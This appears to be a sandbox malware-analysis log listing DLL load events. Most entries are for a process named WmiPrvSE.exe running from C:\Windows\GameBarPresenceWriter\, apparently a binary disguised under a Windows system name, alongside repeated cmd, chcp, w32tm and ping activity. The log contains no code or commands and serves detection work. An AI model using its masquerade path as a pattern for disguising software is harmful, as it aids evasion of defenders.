Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ktmw32.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasapi32.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasman.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dlnashext.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wpdshext.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: edputil.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: urlmon.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iertutil.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: srvcli.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: netutils.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wintypes.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: appresolver.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: slc.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: sppc.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ktmw32.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasapi32.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasman.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dlnashext.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wpdshext.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: edputil.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: urlmon.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iertutil.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: srvcli.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: netutils.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wintypes.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: appresolver.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: slc.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ktmw32.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasapi32.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasman.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dlnashext.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wpdshext.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: edputil.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: urlmon.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iertutil.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: srvcli.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: netutils.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wintypes.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: appresolver.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: slc.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: sppc.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ktmw32.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasapi32.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasman.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dlnashext.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wpdshext.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: edputil.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: urlmon.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iertutil.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: srvcli.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: netutils.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wintypes.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: appresolver.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: slc.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: sppc.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: loadperf.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: ntmarta.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ktmw32.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasapi32.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasman.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dlnashext.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wpdshext.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: edputil.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: urlmon.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iertutil.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: srvcli.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: netutils.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wintypes.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: appresolver.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: slc.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: sppc.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ktmw32.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasapi32.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasman.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dlnashext.dll
